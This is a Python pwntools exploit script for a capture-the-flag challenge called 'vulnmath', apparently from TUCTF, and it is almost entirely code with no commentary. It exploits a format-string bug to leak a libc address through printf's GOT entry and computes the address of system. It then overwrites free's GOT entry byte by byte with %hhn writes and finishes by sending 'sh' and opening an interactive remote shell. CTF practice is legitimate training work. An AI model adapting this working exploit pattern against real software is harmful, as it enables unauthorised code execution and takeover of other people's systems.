vulnmath

from pwn import *
import sys

c = remote("chal.tuctf.com", 30502)

leak_addr = 0x0804c010

r = c.readuntil("\n> ")
c.send(struct.pack("<L", leak_addr) + ".%6$s\n")

got_printf = struct.unpack("<L", c.readuntil("\n> ").split(".")[1][0:4])[0]

print "print@libc: %08x" % got_printf

# theirs
libc_delta = 0x54230
system_delta = 0x458b0

libc_base = got_printf - libc_delta
print "libc base : %08x" % libc_base

libc_system = libc_base + system_delta

print "libc system: %08x" % libc_system

got_free = 0x0804c014

n_a = 0x100 + ((libc_system & 0xff) - 5)
n_b = ((libc_system >> 8)& 0xff) - 5
n_c = ((libc_system >> 16) & 0xff) - 5
n_d = ((libc_system >> 24) & 0xff) - 5

c.send(struct.pack("<L", got_free + 0) + ".%" + str(n_a) + "c%6$hhn\n")
c.readuntil("\n> ")
c.send(struct.pack("<L", got_free + 1) + ".%" + str(n_b) + "c%6$hhn\n")
c.readuntil("\n> ")
c.send(struct.pack("<L", got_free + 2) + ".%" + str(n_c) + "c%6$hhn\n")
c.readuntil("\n> ")
c.send(struct.pack("<L", got_free + 3) + ".%" + str(n_d) + "c%6$hhn\n")

c.readuntil("\n> ")
c.send("sh" + "\x00"*30)

c.interactive()